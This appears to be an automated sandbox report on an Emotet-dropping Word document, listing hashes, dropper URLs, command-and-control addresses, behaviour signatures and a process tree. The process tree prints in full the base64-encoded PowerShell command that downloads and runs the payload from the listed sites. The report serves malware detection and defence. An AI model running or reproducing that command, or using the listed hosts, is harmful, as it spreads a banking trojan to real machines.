Analysis

  • max time kernel
    28s
  • resource
    win10v191014
  • submitted
    29-01-2020 14:47

General

  • Target

    9ab92e41150dd1c132be3b79097a4b4fff2a151a9a5d77bd3e0aaeb41a5b862b.doc

  • Sample

    200129-s31j4whpy6

  • SHA256

    9ab92e41150dd1c132be3b79097a4b4fff2a151a9a5d77bd3e0aaeb41a5b862b

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://bestcondodeals.net/wp-content/mYdUiWX/

exe.dropper

http://bpbd.tabalongkab.go.id/cgi-bin/IBEHVS/

exe.dropper

http://cajasparabotella.com/onptlekdj24sf/YtgArZrn/

exe.dropper

http://boardgamesofold.com/wp-admin/a9illa9n-xzmtn3d4q5-1767396/

exe.dropper

http://ashishswarup.in/wp-includes/xovzx5w-4avccc6-572705647/

Extracted

Family

emotet

C2

186.10.98.177:80

154.70.158.97:80

95.66.182.136:80

68.183.18.169:8080

178.62.75.204:8080

178.33.167.120:8080

144.76.56.36:8080

61.204.119.188:443

163.172.107.70:8080

156.155.163.232:80

91.117.31.181:80

153.183.25.24:80

110.2.118.164:80

195.250.143.182:80

162.154.175.215:80

50.116.78.109:8080

72.176.87.136:80

184.162.115.11:443

37.70.131.107:80

181.39.96.86:443

rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Process spawned unexpected child process 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9ab92e41150dd1c132be3b79097a4b4fff2a151a9a5d77bd3e0aaeb41a5b862b.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    • Enumerates system info in registry
    PID:4964
  • C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
    PoWERsheLL -e JABJAG8AcAB1AG4AbwB4AGUAZAA9ACcAVABuAGkAawBjAHkAbwBkAGUAbAAnADsAJABKAGEAYwB0AG8AYgB0AGYAYQBjACAAPQAgACcANwA5ADYAJwA7ACQATQBiAGoAZQBnAGoAagBrAGsAPQAnAE0AbgBvAGsAbgBhAHQAaAAnADsAJABKAG4AdgB4AG0AYQBkAGkAeQBiAHkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEoAYQBjAHQAbwBiAHQAZgBhAGMAKwAnAC4AZQB4AGUAJwA7ACQASQBmAGcAcQBxAGgAbQB6AGcAdABvAD0AJwBIAGwAZgB0AHgAdQBjAGEAaQB2ACcAOwAkAE4AaABvAG8AcAB4AHYAagBqAG4APQAuACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQBUAC4AVwBFAEIAYwBMAEkARQBOAFQAOwAkAFMAdgB5AHAAawB2AGwAZwA9ACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AGMAbwBuAGQAbwBkAGUAYQBsAHMALgBuAGUAdAAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBtAFkAZABVAGkAVwBYAC8AKgBoAHQAdABwADoALwAvAGIAcABiAGQALgB0AGEAYgBhAGwAbwBuAGcAawBhAGIALgBnAG8ALgBpAGQALwBjAGcAaQAtAGIAaQBuAC8ASQBCAEUASABWAFMALwAqAGgAdAB0AHAAOgAvAC8AYwBhAGoAYQBzAHAAYQByAGEAYgBvAHQAZQBsAGwAYQAuAGMAbwBtAC8AbwBuAHAAdABsAGUAawBkAGoAMgA0AHMAZgAvAFkAdABnAEEAcgBaAHIAbgAvACoAaAB0AHQAcAA6AC8ALwBiAG8AYQByAGQAZwBhAG0AZQBzAG8AZgBvAGwAZAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AYQA5AGkAbABsAGEAOQBuAC0AeAB6AG0AdABuADMAZAA0AHEANQAtADEANwA2ADcAMwA5ADYALwAqAGgAdAB0AHAAOgAvAC8AYQBzAGgAaQBzAGgAcwB3AGEAcgB1AHAALgBpAG4ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwB4AG8AdgB6AHgANQB3AC0ANABhAHYAYwBjAGMANgAtADUANwAyADcAMAA1ADYANAA3AC8AJwAuACIAcwBgAFAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABQAGoAZABwAGQAcwBtAGMAcABlAHYAZABuAD0AJwBXAGsAZAB6AHAAeABjAGcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAZABqAGcAaQBmAHAAdgB5AGYAIABpAG4AIAAkAFMAdgB5AHAAawB2AGwAZwApAHsAdAByAHkAewAkAE4AaABvAG8AcAB4AHYAagBqAG4ALgAiAGQAYABvAHcATgBMAGAATwBBAEQAZgBpAGwAZQAiACgAJABGAGQAagBnAGkAZgBwAHYAeQBmACwAIAAkAEoAbgB2AHgAbQBhAGQAaQB5AGIAeQApADsAJABIAHYAbgB1AG8AegBrAGIAcwA9ACcASQBqAGQAYgBiAG0AdQBkAHAAYgBnAGkAcwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEoAbgB2AHgAbQBhAGQAaQB5AGIAeQApAC4AIgBMAGAAZQBOAGcAVABIACIAIAAtAGcAZQAgADIANAAzADEAMgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwByAGUAYABBAFQARQAiACgAJABKAG4AdgB4AG0AYQBkAGkAeQBiAHkAKQA7ACQAVwBvAGEAbQBkAGYAaAB3AHcAPQAnAEEAZgBsAGIAdgBvAGUAbwBhACcAOwBiAHIAZQBhAGsAOwAkAE8AbABpAGQAaQBnAGEAbgB1AHAAegB1AG4APQAnAE8AdQBkAGMAZwBlAGIAZgB0AHgAZQBhACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AcQBwAGUAeQBhAHAAZQBhAHcAYgB2AD0AJwBSAGIAawB4AG8AZAB6AGsAbAAnAA==
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    PID:4620
  • C:\Users\Admin\796.exe
    C:\Users\Admin\796.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:4384
    • C:\Users\Admin\796.exe
      --52ac7a52
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Drops file in System32 directory
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      PID:4032
  • C:\Windows\SysWOW64\basicwce.exe
    "C:\Windows\SysWOW64\basicwce.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:4200
    • C:\Windows\SysWOW64\basicwce.exe
      --8726bf5d
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      PID:4024

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\796.exe
  • C:\Users\Admin\796.exe
  • C:\Users\Admin\796.exe
  • C:\Windows\SysWOW64\basicwce.exe
  • C:\Windows\SysWOW64\basicwce.exe
  • memory/4024-16-0x0000000000C80000-0x0000000000C97000-memory.dmp
    Filesize

    92KB

  • memory/4024-17-0x0000000000400000-0x0000000000489000-memory.dmp
    Filesize

    548KB

  • memory/4032-11-0x0000000000530000-0x0000000000547000-memory.dmp
    Filesize

    92KB

  • memory/4032-12-0x0000000000400000-0x0000000000489000-memory.dmp
    Filesize

    548KB

  • memory/4200-14-0x00000000005F0000-0x0000000000607000-memory.dmp
    Filesize

    92KB

  • memory/4384-9-0x0000000000560000-0x0000000000577000-memory.dmp
    Filesize

    92KB